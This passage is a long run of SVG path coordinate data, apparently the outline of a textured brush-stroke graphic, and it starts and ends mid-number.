-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.